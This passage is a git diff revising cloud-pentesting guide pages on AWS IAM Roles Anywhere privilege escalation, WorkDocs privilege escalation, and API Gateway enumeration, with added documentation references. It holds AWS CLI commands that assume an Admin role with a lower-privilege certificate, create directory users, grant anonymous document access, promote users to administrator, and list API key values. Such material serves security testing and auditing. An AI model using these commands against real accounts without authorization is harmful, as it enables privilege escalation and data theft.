+To understand this attack, it is necessary to explain what a trust anchor is. A trust anchor in AWS IAM Roles Anywhere is a reference to a Certificate Authority (CA) that AWS uses to validate presented X.509 certificates. If the client certificate was issued by that CA and the trust anchor is active, IAM Roles Anywhere can validate it as an authentication certificate.<sup>[[8]](#references)[[9]](#references)</sup>
 
-In addition, a profile is the configuration that defines which attributes of the X.509 certificate (such as CN, OU, or SAN) will be transformed into session tags, and these tags will later be compared against the conditions of the trust policy.
+In addition, a profile specifies which roles IAM Roles Anywhere can assume and can limit the permissions of the resulting session. During certificate authentication, IAM Roles Anywhere extracts fields from the certificate subject, issuer, and Subject Alternative Name (SAN) into principal tags; trust-policy conditions can compare those values, including relative distinguished names such as CN or OU.<sup>[[8]](#references)[[9]](#references)</sup>
 
-This policy lacks restrictions on which trust anchor or certificate attributes are allowed. As a result, any certificate tied to any trust anchor in the account can be used to assume this role.
+This policy lacks restrictions on which trust anchor or certificate attributes are allowed. Therefore, a valid certificate from the CA represented by the selected trust anchor (including a subordinate CA) can be used to assume this role, making it a privilege-escalation target when a lower-privilege workload can obtain such a certificate.<sup>[[1]](#references)[[8]](#references)[[9]](#references)</sup>
 
 ```json
 {
@@ -126,9 +123,9 @@ This policy lacks restrictions on which trust anchor or certificate attributes a
 
 ```
 
-To privesc, the `aws_signing_helper` is required from https://docs.aws.amazon.com/rolesanywhere/latest/userguide/credential-helper.html
+To privesc, the [`aws_signing_helper` credential helper](https://docs.aws.amazon.com/rolesanywhere/latest/userguide/credential-helper.html) is required.<sup>[[10]](#references)</sup>
 
-Then using a valid certificate the attacker can pivot into the higher privilege role 
+Then using a valid certificate the attacker can pivot into the higher privilege role.<sup>[[1]](#references)[[9]](#references)[[10]](#references)</sup>
 
 ```bash
 aws_signing_helper credential-process \
@@ -139,16 +136,26 @@ aws_signing_helper credential-process \
   --role-arn arn:aws:iam::123456789012:role/Admin
 ```
 
-The trust anchor validates that the client’s `readonly.pem` certificate comes from its authorized CA, and within this `readonly.pem` certificate is the public key that AWS uses to verify that the signature was made with its corresponding private key `readonly.key`.
+The trust anchor validates that the client’s `readonly.pem` certificate comes from its authorized CA, and IAM Roles Anywhere uses the certificate's public key to verify the signature made with its corresponding private key `readonly.key`.<sup>[[9]](#references)</sup>
 
-The certificate also provides attributes (such as CN or OU) that the `default` profile transforms into tags, which the role’s trust policy can use to decide whether to authorize access. If there are no conditions in the trust policy, those tags have no use, and access is granted to anyone with a valid certificate.
+The certificate also provides attributes (such as CN or OU) that IAM Roles Anywhere exposes as principal tags, which the role’s trust policy can use to decide whether to authorize access. If there are no conditions in the trust policy, those tags have no use, and access is granted to anyone with a valid certificate from the trust-anchor CA.<sup>[[8]](#references)[[9]](#references)</sup>
 
-For this attack to be possible, both the trust anchor and the `default` profile must be active.
+For this attack to be possible, both the trust anchor and the `default` profile must be active.<sup>[[12]](#references)[[13]](#references)</sup>
 
-### References
+## References
 
-- [https://www.ruse.tech/blogs/aws-roles-anywhere-privilege-escalation](https://www.ruse.tech/blogs/aws-roles-anywhere-privilege-escalation)
+- [1] [Privilege Escalation Using AWS IAM Roles Anywhere](https://www.ruse.tech/blogs/aws-roles-anywhere-privilege-escalation)
+- [2] [AWS JSON policy elements: Principal](https://docs.aws.amazon.com/IAM/latest/UserGuide/reference_policies_elements_principal.html)
+- [3] [assume-role — AWS CLI 2 Command Reference](https://docs.aws.amazon.com/cli/latest/reference/sts/assume-role.html)
+- [4] [Create a role for SAML 2.0 federation (console) — AWS Identity and Access Management](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_roles_create_for-idp_saml.html)
+- [5] [assume-role-with-saml — AWS CLI 2 Command Reference](https://docs.aws.amazon.com/cli/latest/reference/sts/assume-role-with-saml.html)
+- [6] [AssumeRoleWithWebIdentity — AWS Security Token Service](https://docs.aws.amazon.com/STS/latest/APIReference/API_AssumeRoleWithWebIdentity.html)
+- [7] [Configure Pods to use a Kubernetes service account — Amazon EKS](https://docs.aws.amazon.com/eks/latest/userguide/pod-configuration.html)
+- [8] [Getting started with IAM Roles Anywhere](https://docs.aws.amazon.com/rolesanywhere/latest/userguide/getting-started.html)
+- [9] [The IAM Roles Anywhere trust model](https://docs.aws.amazon.com/rolesanywhere/latest/userguide/trust-model.html)
+- [10] [Get temporary security credentials from IAM Roles Anywhere](https://docs.aws.amazon.com/rolesanywhere/latest/userguide/credential-helper.html)
+- [11] [onelogin-python-aws-assume-role](https://github.com/onelogin/onelogin-python-aws-assume-role)
+- [12] [TrustAnchorDetail — IAM Roles Anywhere](https://docs.aws.amazon.com/rolesanywhere/latest/APIReference/API_TrustAnchorDetail.html)
+- [13] [ProfileDetail — IAM Roles Anywhere](https://docs.aws.amazon.com/rolesanywhere/latest/APIReference/API_ProfileDetail.html)
 
 {{#include ../../../../banners/hacktricks-training.md}}
-
-

--- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-workdocs-privesc/README.md
+++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-workdocs-privesc/README.md
@@ -1,7 +1,5 @@
 # AWS - WorkDocs Privesc
 
-{{#include ../../../../banners/hacktricks-training.md}}
-
 ## WorkDocs
 
 For more info about WorkDocs check:
@@ -12,48 +10,67 @@ For more info about WorkDocs check:
 
 ### `workdocs:CreateUser`
 
-Create a user inside the Directory indicated, then you will have access to both WorkDocs and AD:
+With `workdocs:CreateUser`, a principal can create an active user in a Simple AD or Microsoft AD directory, and the new user can access WorkDocs. This operation is not valid for an AD Connector configuration, where the user must already exist in the directory.<sup>[[1]](#references)[[2]](#references)[[3]](#references)</sup>
+
+Use the following AWS CLI command with the target organization ID and the new user's details.<sup>[[4]](#references)</sup>
 
 ```bash
-# Create user (created inside the AD)
+# Create a user in the directory
 aws workdocs create-user --username testingasd --given-name testingasd --surname testingasd --password <password> --email-address name@directory.domain --organization-id <directory-id>
 ```
 
-### `workdocs:GetDocument`, `(workdocs:`DescribeActivities`)`
+### `workdocs:DescribeActivities`, `workdocs:GetDocument`, and `workdocs:GetDocumentVersion`
 
-The files might contain sensitive information, read them:
+`DescribeActivities` returns activity records for an organization and can filter them by user. For administrative SigV4 requests, include `--organization-id` even when filtering with `--user-id`. `GetDocument` returns document metadata; use its latest-version ID with `GetDocumentVersion --fields SOURCE` to request a source URL for the document content.<sup>[[5]](#references)[[6]](#references)[[7]](#references)</sup>
 
 ```bash
-# Get what was created in the directory
+# Enumerate activity metadata for the organization
 aws workdocs describe-activities --organization-id <directory-id>
 
-# Get what each user has created
-aws workdocs describe-activities --user-id "S-1-5-21-377..."
+# Filter activity metadata to a user
+aws workdocs describe-activities --organization-id <directory-id> --user-id "S-1-5-21-377..."
 
-# Get file (a url to access with the content will be retreived)
+# Get document metadata and its latest version ID
 aws workdocs get-document --document-id <doc-id>
+
+# Request a source URL for a chosen document version
+aws workdocs get-document-version --document-id <doc-id> --version-id <version-id> --fields SOURCE
 ```
 
 ### `workdocs:AddResourcePermissions`
 
-If you don't have access to read something, you can just grant it
+If you have this permission, you can grant a specified principal access to a document or folder. An `ANONYMOUS` `VIEWER` principal provides read-only external-link access when the site's link-sharing settings allow public links.<sup>[[8]](#references)[[9]](#references)</sup>
 
 ```bash
-# Add permission so anyway can see the file
+# Add permission so an anonymous viewer can view the file
 aws workdocs add-resource-permissions --resource-id <id> --principals Id=anonymous,Type=ANONYMOUS,Role=VIEWER
-## This will give an id, the file will be acesible in: https://<name>.awsapps.com/workdocs/index.html#/share/document/<id>
+# Use the returned ShareResults/ShareId with the WorkDocs sharing link.
 ```
 
-### `workdocs:AddUserToGroup`
+### `workdocs:UpdateUser`
 
-You can make a user admin by setting it in the group ZOCALO_ADMIN.\
-For that follow the instructions from [https://docs.aws.amazon.com/workdocs/latest/adminguide/manage_set_admin.html](https://docs.aws.amazon.com/workdocs/latest/adminguide/manage_set_admin.html)
+`workdocs:AddUserToGroup` is a permission-only action and has no directly invocable WorkDocs API operation. The documented API/CLI route to grant administrator privileges is `UpdateUser` with `Type=ADMIN`; the WorkDocs console also provides **Set an administrator**.<sup>[[3]](#references)[[10]](#references)[[11]](#references)</sup>
 
-Login with that user in workdoc and access the admin panel in `/workdocs/index.html#/admin`
+```bash
+# Promote an active WorkDocs user to administrator
+aws workdocs update-user --user-id <user-id> --type ADMIN
+```
 
-I didn't find any way to do this from the cli.
+Sign in as that user and open the WorkDocs admin control panel from the profile menu.<sup>[[12]](#references)</sup>
 
+## References
 
-
+- [1] [CreateUser - AWS SDK for Ruby V3](https://docs.aws.amazon.com/sdk-for-ruby/v3/api/Aws/WorkDocs/Client.html#create_user-instance_method)
+- [2] [Creating a user - archived Amazon WorkDocs Developer Guide](https://github.com/awsdocs/amazon-workdocs-dev-guide/blob/main/doc_source/creating-newuser.md)
+- [3] [Actions, resources, and condition keys for Amazon WorkDocs](https://docs.aws.amazon.com/service-authorization/latest/reference/list_workdocs.html)
+- [4] [create-user - AWS CLI Command Reference](https://docs.aws.amazon.com/cli/latest/reference/workdocs/create-user.html)
+- [5] [describe-activities - AWS CLI Command Reference](https://docs.aws.amazon.com/cli/latest/reference/workdocs/describe-activities.html)
+- [6] [get-document - AWS CLI Command Reference](https://docs.aws.amazon.com/cli/latest/reference/workdocs/get-document.html)
+- [7] [get-document-version - AWS CLI Command Reference](https://docs.aws.amazon.com/cli/latest/reference/workdocs/get-document-version.html)
+- [8] [add-resource-permissions - AWS CLI Command Reference](https://docs.aws.amazon.com/cli/latest/reference/workdocs/add-resource-permissions.html)
+- [9] [Sharing links - archived Amazon WorkDocs User Guide](https://github.com/awsdocs/amazon-workdocs-user-guide/blob/main/doc_source/web_share_link.md)
+- [10] [update-user - AWS CLI Command Reference](https://docs.aws.amazon.com/cli/latest/reference/workdocs/update-user.html)
+- [11] [Setting site administrators - archived Amazon WorkDocs Administration Guide](https://github.com/awsdocs/amazon-workdocs-administration-guide/blob/main/doc_source/set-administrator.md)
+- [12] [Starting the admin control panel - archived Amazon WorkDocs Administration Guide](https://github.com/awsdocs/amazon-workdocs-administration-guide/blob/main/doc_source/start-console.md)
 
 {{#include ../../../../banners/hacktricks-training.md}}

--- a/src/pentesting-cloud/aws-security/aws-services/README.md
+++ b/src/pentesting-cloud/aws-security/aws-services/README.md
@@ -1,12 +1,10 @@
 # AWS - Services
 
-{{#include ../../../banners/hacktricks-training.md}}
-
 ## Types of services
 
 ### Container services
 
-Services that fall under container services have the following characteristics:
+Services that fall under container services have the following characteristics.<sup>[[1]](#references)</sup>
 
 - The service itself runs on **separate infrastructure instances**, such as EC2.
 - **AWS** is responsible for **managing the operating system and the platform**.
@@ -16,6 +14,8 @@ Services that fall under container services have the following characteristics:
 - **Examples** of AWS container services include Relational Database Service, Elastic Mapreduce, and Elastic Beanstalk.
 
 ### Abstract Services
+
+Abstract services share the following model.<sup>[[1]](#references)</sup>
 
 - These services are **removed, abstracted, from the platform or management layer which cloud applications are built on**.
 - The services are accessed via endpoints using AWS application programming interfaces, APIs.
@@ -28,5 +28,8 @@ Services that fall under container services have the following characteristics:
 
 **The pages of this section are ordered by AWS service. In there you will be able to find information about the service (how it works and capabilities) and that will allow you to escalate privileges.**
 
+## References
+
+- [1] [AWS Security Best Practices](https://d1.awsstatic.com/whitepapers/AWS_Security_Best_Practices.pdf)
 
 {{#include ../../../banners/hacktricks-training.md}}

--- a/src/pentesting-cloud/aws-security/aws-services/aws-api-gateway-enum.md
+++ b/src/pentesting-cloud/aws-security/aws-services/aws-api-gateway-enum.md
@@ -1,39 +1,41 @@
 # AWS - API Gateway Enum
 
-{{#include ../../../banners/hacktricks-training.md}}
-
 ## API Gateway
 
 ### Basic Information
 
-AWS API Gateway is a comprehensive service offered by Amazon Web Services (AWS) designed for developers to **create, publish, and oversee APIs on a large scale**. It functions as an entry point to an application, permitting developers to establish a framework of rules and procedures. This framework governs the access external users have to certain data or functionalities within the application.
+AWS API Gateway is an AWS service for **creating, deploying, and managing REST, HTTP, and WebSocket APIs** that expose backend HTTP endpoints, AWS Lambda functions, or other AWS services. It also provides HTTP and WebSocket endpoints through which clients invoke API methods.<sup>[[1]](#references)</sup>
 
-API Gateway enables you to define **how requests to your APIs should be handled**, and it can create custom API endpoints with specific methods (e.g., GET, POST, PUT, DELETE) and resources. It can also generate client SDKs (Software Development Kits) to make it easier for developers to call your APIs from their applications.
+API Gateway lets you define **how requests to your APIs should be handled** by creating resources or routes and methods such as GET, POST, PUT, and DELETE. It can also generate client SDKs for REST APIs to make it easier for applications to call the API.<sup>[[1]](#references)[[3]](#references)</sup>
 
-### API Gateways Types
+### API Gateway Types
 
-- **HTTP API**: Build low-latency and cost-effective REST APIs with built-in features such as OIDC and OAuth2, and native CORS support. Works with the following: Lambda, HTTP backends.
-- **WebSocket API**: Build a WebSocket API using persistent connections for real-time use cases such as chat applications or dashboards. Works with the following: Lambda, HTTP, AWS Services.
-- **REST API**: Develop a REST API where you gain complete control over the request and response along with API management capabilities. Works with the following: Lambda, HTTP, AWS Services.
-- **REST API Private**: Create a REST API that is only accessible from within a VPC.
+- **HTTP API**: Build low-latency, lower-cost RESTful APIs with features such as native CORS and JWT authorization. HTTP APIs integrate with Lambda functions and HTTP backends.<sup>[[2]](#references)</sup>
+- **WebSocket API**: Build a WebSocket API using persistent connections for real-time use cases such as chat applications or dashboards. WebSocket APIs integrate with Lambda, HTTP, and AWS services.<sup>[[1]](#references)</sup>
+- **REST API**: Develop a REST API with broader request, response, and API-management capabilities. REST APIs integrate with Lambda, HTTP, and AWS services.<sup>[[2]](#references)</sup>
+- **Private REST API**: Create a REST API with a private endpoint exposed through interface VPC endpoints, isolated from the public internet.<sup>[[1]](#references)[[2]](#references)</sup>
 
 ### API Gateway Main Components
 
-1. **Resources**: In API Gateway, resources are the components that **make up the structure of your API**. They represent **the different paths or endpoints** of your API and correspond to the various actions that your API supports. A resource is each method (e.g., GET, POST, PUT, DELETE) **inside each path** (/, or /users, or /user/{id}.
-2. **Stages**: Stages in API Gateway represent **different versions or environments** of your API, such as development, staging, or production. You can use stages to manage and deploy **multiple versions of your API simultaneousl**y, allowing you to test new features or bug fixes without affecting the production environment. Stages also **support stage variables**, which are key-value pairs that can be used to configure the behavior of your API based on the current stage. For example, you could use stage variables to direct API requests to different Lambda functions or other backend services depending on the stage.
-   - The stage is indicated at the beggining of the URL of the API Gateway endpoint.
-3. **Authorizers**: Authorizers in API Gateway are responsible for **controlling access to your API** by verifying the identity of the caller before allowing the request to proceed. You can use **AWS Lambda functions** as custom authorizers, which allows you to implement your own authentication and authorization logic. When a request comes in, API Gateway passes the request's authorization token to the Lambda authorizer, which processes the token and returns an IAM policy that determines what actions the caller is allowed to perform. API Gateway also supports **built-in authorizers**, such as **AWS Identity and Access Management (IAM)** and **Amazon Cognito**.
-4. **Resource Policy**: A resource policy in API Gateway is a JSON document that **defines the permissions for accessing your API**. It is similar to an IAM policy but specifically tailored for API Gateway. You can use a resource policy to control who can access your API, which methods they can call, and from which IP addresses or VPCs they can connect. **Resource policies can be used in combination with authorizers** to provide fine-grained access control for your API.
-   - In order to make effect the API needs to be **deployed again after** the resource policy is modified.
+1. **Resources and methods**: In REST APIs, resources form the path tree (such as `/`, `/users`, or `/user/{id}`), and each resource can expose one or more methods identified by HTTP verbs such as GET, POST, PUT, or DELETE. HTTP APIs expose routes and methods instead.<sup>[[1]](#references)</sup>
+2. **Stages**: A stage is a named reference to a point-in-time deployment snapshot, such as `dev`, `staging`, or `prod`. Stages let you expose multiple deployments and support **stage variables**, which are key-value pairs that can configure an API's behavior for a particular stage, such as selecting a backend Lambda function or HTTP endpoint. The stage name appears in the invoke URL.<sup>[[1]](#references)[[4]](#references)[[16]](#references)</sup>
+3. **Authorizers**: Authorizers **control access to API methods** by verifying the caller before the request proceeds. Lambda authorizers can implement custom authentication and return an IAM policy; REST APIs also support IAM and Amazon Cognito authorizers.<sup>[[2]](#references)[[17]](#references)</sup>
+4. **Resource policy**: An API Gateway resource policy is a JSON document attached to an API that can control which principals, source IP ranges, VPCs, or VPC endpoints may invoke it. Resource policies can be evaluated together with IAM policies or Lambda/Cognito authorizers. The API must be deployed again after a resource policy is modified for the change to take effect.<sup>[[5]](#references)[[6]](#references)[[26]](#references)</sup>
 
 ### Logging
 
-By default, **CloudWatch Logs** are **off**, **Access Logging** is **off**, and **X-Ray tracing** is also **off**.
+For REST APIs, execution logging and access logging are independent stage settings, so check whether each is enabled before relying on logs. X-Ray tracing is passive by default and becomes active only when tracing is enabled on the stage.<sup>[[7]](#references)[[8]](#references)</sup>
 
 ### Enumeration
 
 > [!TIP]
-> Note that in both AWS apis to enumerate resources (**`apigateway`** and **`apigatewayv2`**) the only permission you need and the only read permission grantable is **`apigateway:GET`**, with that you can **enumerate everything.**
+> For read-only management enumeration, the API Gateway management action used by `get-*` operations is **`apigateway:GET`**. Scope the policy to the relevant API resources where possible; this management permission is separate from `execute-api:Invoke`, which controls calls to deployed methods.<sup>[[9]](#references)[[10]](#references)[[11]](#references)[[12]](#references)</sup>
+
+The AWS CLI command references list the REST `apigateway` and HTTP/WebSocket `apigatewayv2` operations used below.<sup>[[13]](#references)[[14]](#references)</sup>
+
+The `export-api` command writes the OpenAPI definition to the specified output file. The REST API-key commands below can return key values with their include flags, so treat that output as sensitive.<sup>[[15]](#references)[[23]](#references)[[24]](#references)[[25]](#references)</sup>
+
+REST API invoke URLs and named HTTP API stages use the `https://<api-id>.execute-api.<region>.amazonaws.com/<stage>` form; an HTTP API's `$default` stage is served from the base URL without a stage path. Deployed WebSocket APIs use the corresponding `wss://` URL.<sup>[[1]](#references)[[16]](#references)[[17]](#references)</sup>
 
 {{#tabs }}
 {{#tab name="apigateway" }}
@@ -66,8 +68,8 @@ aws apigateway get-gateway-responses --rest-api-id <id>
 aws apigateway get-request-validators --rest-api-id <id>
 aws apigateway get-deployments --rest-api-id <id>
 
-# Get api keys generated
-aws apigateway get-api-keys --include-value
+# Get API keys generated (treat returned values as secrets)
+aws apigateway get-api-keys --include-values
 aws apigateway get-api-key --api-key <id> --include-value # Get just 1
 ## Example use API key
 curl -X GET -H "x-api-key: AJE&Ygenu4[..]" https://e83uuftdi8.execute-api.us-east-1.amazonaws.com/dev/test
@@ -90,7 +92,7 @@ aws apigatewayv2 get-domain-name --domain-name <name>
 aws apigatewayv2 get-vpc-links
 
 # Enumerate APIs
-aws apigatewayv2 get-apis # This will also show the resource policy (if any)
+aws apigatewayv2 get-apis
 aws apigatewayv2 get-api --api-id <id>
 
 ## Get all the info from an api at once
@@ -112,7 +114,7 @@ aws apigatewayv2 get-integrations --api-id <id>
 
 ## Get authorizers
 aws apigatewayv2 get-authorizers --api-id <id>
-aws apigatewayv2 get-authorizer --api-id <id> --authorizer-id <uth-id>
+aws apigatewayv2 get-authorizer --api-id <id> --authorizer-id <auth-id>
 
 ## Get domain mappings
 aws apigatewayv2 get-api-mappings --api-id <id> --domain-name <dom-name>
@@ -121,8 +123,10 @@ aws apigatewayv2 get-api-mapping --api-id <id> --api-mapping-id <map-id> --domai
 ## Get models
 aws apigatewayv2 get-models --api-id <id>
 
-## Call API
+## Call HTTP API
 https://<api-id>.execute-api.<region>.amazonaws.com/<stage>/<resource>
+## Call WebSocket API
+wss://<api-id>.execute-api.<region>.amazonaws.com/<stage>
 ```
 
 {{#endtab }}
@@ -132,47 +136,51 @@ https://<api-id>.execute-api.<region>.amazonaws.com/<stage>/<resource>
 
 ### Resource Policy
 
-It's possible to use resource policies to define who could call the API endpoints.\
-In the following example you can see that the **indicated IP cannot call** the endpoint `/resource_policy` via GET.
+Resource policies can allow or deny API invocation based on principals, source IP ranges, VPCs, or VPC endpoints. In the following example, the **indicated IP cannot call** the endpoint `/resource_policy` via GET.<sup>[[5]](#references)</sup>
 
 <figure><img src="../../../images/image (256).png" alt=""><figcaption></figcaption></figure>
 
 ### IAM Authorizer
 
-It's possible to set that a methods inside a path (a resource) requires IAM authentication to call it.
+An API method can be configured with the `AWS_IAM` authorization type so that callers must authenticate with AWS credentials and have the required `execute-api:Invoke` permission.<sup>[[11]](#references)[[12]](#references)</sup>
 
 <figure><img src="https://lh3.googleusercontent.com/GGx-kfqNXu6zMqGidnO8_eR88fYPpJG-wNuBBnedAJntiRUEPTEScl7OvWthGYRiI_msYCdC6oBFvJc827Tb4-4UogxpOyrEXyst-8IDzP9DC2NOtXSY7w58L0baCAcBQjSyvBhJREvWWCtiboNYPSKuEw=s2048" alt=""><figcaption></figcaption></figure>
 
-When this is set you will receive the error `{"message":"Missing Authentication Token"}` when you try to reach the endpoint without any authorization.
+An undefined API resource or unsupported method can return `{"message":"Missing Authentication Token"}`. This response is not, by itself, proof that an IAM authorizer is configured.<sup>[[20]](#references)</sup>
 
-One easy way to generate the expected token by the application is to use **curl**.
+To sign an IAM-authorized request with **curl**, use AWS credentials that are authorized for the method.<sup>[[12]](#references)</sup>
 
 ```bash
 $ curl -X <method> https://<api-id>.execute-api.<region>.amazonaws.com/<stage>/<resource> --user <AWS_ACCESS_KEY>:<AWS_SECRET_KEY> --aws-sigv4 "aws:amz:<region>:execute-api"
 ```
 
-Another way is to use the **`Authorization`** type **`AWS Signature`** inside **Postman**.
+Another way is to use the **`Authorization`** type **`AWS Signature`** inside **Postman**.<sup>[[12]](#references)</sup>
 
 <figure><img src="../../../images/image (168).png" alt=""><figcaption></figcaption></figure>
 
-Set the accessKey and the SecretKey of the account you want to use and you can know authenticate against the API endpoint.
+Set the access key and secret key for an authorized principal to authenticate against the API endpoint.
 
-Both methods will generate an **Authorization** **header** such as:
+Both methods generate an **Authorization** **header** such as the following. IAM-authorized requests use Signature Version 4 or Signature Version 4a.<sup>[[12]](#references)</sup>
 
 ```
 AWS4-HMAC-SHA256 Credential=AKIAYY7XU6ECUDOTWB7W/20220726/us-east-1/execute-api/aws4_request, SignedHeaders=host;x-amz-date, Signature=9f35579fa85c0d089c5a939e3d711362e92641e8c14cc571df8c71b4bc62a5c2
 ```
 
-Note that in other cases the **Authorizer** might have been **bad coded** and just sending **anything** inside the **Authorization header** will **allow to see the hidden content**.
+If a custom authorizer is badly implemented and checks only that the **Authorization** header is present, an arbitrary value might be accepted. That is an authorizer implementation flaw, not a property of API Gateway; test invalid and empty values when auditing an endpoint.<sup>[[18]](#references)</sup>
 
 ### Request Signing Using Python
 
-```python
+Install the required packages:
 
+```bash
 pip install requests
 pip install requests-aws4auth
 pip install boto3
+```
 
+Then sign the request with the credentials in the current session.<sup>[[12]](#references)</sup>
+
+```python
 import boto3
 import requests
 from requests_aws4auth import AWS4Auth
@@ -182,7 +190,7 @@ service = 'execute-api'
 access_key = 'YOUR_ACCESS_KEY'
 secret_key = 'YOUR_SECRET_KEY'
 
-url = 'https://<apiid>.execute-api.us-east-1.amazonaws.com/<stage>/<resource>'
+url = f'https://<apiid>.execute-api.{region}.amazonaws.com/<stage>/<resource>'
 
 session = boto3.Session(aws_access_key_id=access_key, aws_secret_access_key=secret_key)
 credentials = session.get_credentials()
@@ -196,38 +204,25 @@ print(response.text)
 
 ### Custom Lambda Authorizer
 
-It's possible to use a lambda that based in a given token will **return an IAM policy** indicating if the user is **authorized to call the API endpoint**.\
-You can set each resource method that will be using the authoriser.
+A Lambda authorizer can authenticate a caller from a token or request parameters and **return an IAM policy** indicating whether the caller is **authorized to call the API method**. The authorizer must return a principal identifier and policy document; this example demonstrates a token-based REST authorizer.<sup>[[18]](#references)[[19]](#references)</sup>
 
 <details>
 
 <summary>Lambda Authorizer Code Example</summary>
 
 ```python
-import json
-
 def lambda_handler(event, context):
-    token = event['authorizationToken']
+    token = event.get('authorizationToken', '')
     method_arn = event['methodArn']
 
-    if not token:
-        return {
-            'statusCode': 401,
-            'body': 'Unauthorized'
-        }
+    if token == "your-secret-token":
+        effect = 'Allow'
+    elif token:
+        effect = 'Deny'
+    else:
+        raise Exception('Unauthorized')
 
-    try:
-        # Replace this with your own token validation logic
-        if token == "your-secret-token":
-            return generate_policy('user', 'Allow', method_arn)
-        else:
-            return generate_policy('user', 'Deny', method_arn)
-    except Exception as e:
-        print(e)
-        return {
-            'statusCode': 500,
-            'body': 'Internal Server Error'
-        }
+    return generate_policy('user', effect, method_arn)
 
 def generate_policy(principal_id, effect, resource):
     policy = {
@@ -254,21 +249,21 @@ Call it with something like:
 </strong></code></pre>
 
 > [!WARNING]
-> Depending on the Lambda code, this authorization might be vulnerable
+> Depending on the Lambda code, this authorization might be vulnerable. Test empty, invalid, and replayed tokens, and inspect whether the function validates the token rather than merely checking that the header exists.<sup>[[18]](#references)</sup>
 
-Note that if a **deny policy is generated and returned** the error returned by API Gateway is: `{"Message":"User is not authorized to access this resource with an explicit deny"}`
+If a **Deny policy is generated and returned**, API Gateway rejects the method; outside the authorizer test environment, AWS documents this as a `403 Forbidden` response. The exact response body can depend on gateway-response customization.<sup>[[18]](#references)[[20]](#references)</sup>
 
-This way you could **identify this authorization** being in place.
+A deny response can indicate authorizer rejection, but it does not by itself prove which authorization control produced it; confirm by inspecting the method configuration and testing multiple inputs.<sup>[[18]](#references)[[20]](#references)</sup>
 
-### Required API Key
+### Required API Key (REST APIs)
 
-It's possible to set API endpoints that **require a valid API key** to contact it.
+REST API methods can be configured to **require a valid API key**. API keys identify clients for usage plans; AWS recommends using IAM, a Lambda authorizer, or Amazon Cognito for authentication and authorization.<sup>[[2]](#references)[[21]](#references)</sup>
 
 <figure><img src="../../../images/image (88).png" alt=""><figcaption></figcaption></figure>
 
-It's possible to generate API keys in the API Gateway portal and even set how much it can be used (in terms of requests per second and in terms of requests per month).
+You can generate API keys in API Gateway and associate them with usage plans that define target throttling rates and quotas, such as requests per second and requests per month. These limits are best-effort rather than hard security boundaries.<sup>[[21]](#references)</sup>
 
-To make an API key work, you need to add it to a **Usage Plan**, this usage plan mus be added to the **API Stage** and the associated API stage needs to have a configured a **method throttling** to the **endpoint** requiring the API key:
+To use a header-sourced API key, deploy the API to a stage, add that stage to a **Usage Plan**, attach an API key to the plan, configure the method to require an API key, and redeploy the API. Method-level throttling is optional; it is not required for API-key validation.<sup>[[21]](#references)[[22]](#references)</sup>
 
 <figure><img src="../../../images/image (198).png" alt=""><figcaption></figcaption></figure>
 
@@ -296,8 +291,33 @@ To make an API key work, you need to add it to a **Usage Plan**, this usage plan
 ../aws-persistence/aws-api-gateway-persistence/README.md
 {{#endref}}
 
+## References
+
+- [1] [Amazon API Gateway concepts](https://docs.aws.amazon.com/apigateway/latest/developerguide/api-gateway-basic-concept.html)
+- [2] [Choose between REST APIs and HTTP APIs](https://docs.aws.amazon.com/apigateway/latest/developerguide/http-api-vs-rest.html)
+- [3] [Generate SDKs for REST APIs in API Gateway](https://docs.aws.amazon.com/apigateway/latest/developerguide/how-to-generate-sdk.html)
+- [4] [Use stage variables for a REST API in API Gateway](https://docs.aws.amazon.com/apigateway/latest/developerguide/stage-variables.html)
+- [5] [Control access to a REST API with API Gateway resource policies](https://docs.aws.amazon.com/apigateway/latest/developerguide/apigateway-resource-policies.html)
+- [6] [Create and attach an API Gateway resource policy to an API](https://docs.aws.amazon.com/apigateway/latest/developerguide/apigateway-resource-policies-create-attach.html)
+- [7] [Set up CloudWatch logging for REST APIs in API Gateway](https://docs.aws.amazon.com/apigateway/latest/developerguide/set-up-logging.html)
+- [8] [Set up AWS X-Ray with API Gateway REST APIs](https://docs.aws.amazon.com/apigateway/latest/developerguide/apigateway-enabling-xray.html)
+- [9] [How Amazon API Gateway works with IAM](https://docs.aws.amazon.com/apigateway/latest/developerguide/security_iam_service-with-iam.html)
+- [10] [Actions, resources, and condition keys for Amazon API Gateway Management](https://docs.aws.amazon.com/service-authorization/latest/reference/list_apigateway.html)
+- [11] [Control access to a REST API with IAM permissions](https://docs.aws.amazon.com/apigateway/latest/developerguide/permissions.html)
+- [12] [Control access for invoking an API](https://docs.aws.amazon.com/apigateway/latest/developerguide/api-gateway-control-access-using-iam-policies-to-invoke-api.html)
+- [13] [apigateway — AWS CLI Command Reference](https://docs.aws.amazon.com/cli/latest/reference/apigateway/)
+- [14] [apigatewayv2 — AWS CLI Command Reference](https://docs.aws.amazon.com/cli/latest/reference/apigatewayv2/)
+- [15] [export-api — AWS CLI Command Reference](https://docs.aws.amazon.com/cli/latest/reference/apigatewayv2/export-api.html)
+- [16] [Invoke REST APIs in API Gateway](https://docs.aws.amazon.com/apigateway/latest/developerguide/how-to-call-api.html)
+- [17] [Deploy WebSocket APIs in API Gateway](https://docs.aws.amazon.com/apigateway/latest/developerguide/apigateway-set-up-websocket-deployment.html)
+- [18] [Use API Gateway Lambda authorizers](https://docs.aws.amazon.com/apigateway/latest/developerguide/apigateway-use-lambda-authorizer.html)
+- [19] [Output from an API Gateway Lambda authorizer](https://docs.aws.amazon.com/apigateway/latest/developerguide/api-gateway-lambda-authorizer-output.html)
+- [20] [Gateway responses for REST APIs in API Gateway](https://docs.aws.amazon.com/apigateway/latest/developerguide/api-gateway-gatewayResponse-definition.html)
+- [21] [Usage plans and API keys for REST APIs in API Gateway](https://docs.aws.amazon.com/apigateway/latest/developerguide/api-gateway-api-usage-plans.html)
+- [22] [Call a method using an API key](https://docs.aws.amazon.com/apigateway/latest/developerguide/api-gateway-api-key-call.html)
+- [23] [get-api-keys — AWS CLI Command Reference](https://docs.aws.amazon.com/cli/latest/reference/apigateway/get-api-keys.html)
+- [24] [get-api-key — AWS CLI Command Reference](https://docs.aws.amazon.com/cli/latest/reference/apigateway/get-api-key.html)
+- [25] [get-usage-plan-keys — AWS CLI Command Reference](https://docs.aws.amazon.com/cli/latest/reference/apigateway/get-usage-plan-keys.html)
+- [26] [How API Gateway resource policies affect authorization workflow](https://docs.aws.amazon.com/apigateway/latest/developerguide/apigateway-authorization-flow.html)
+
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-

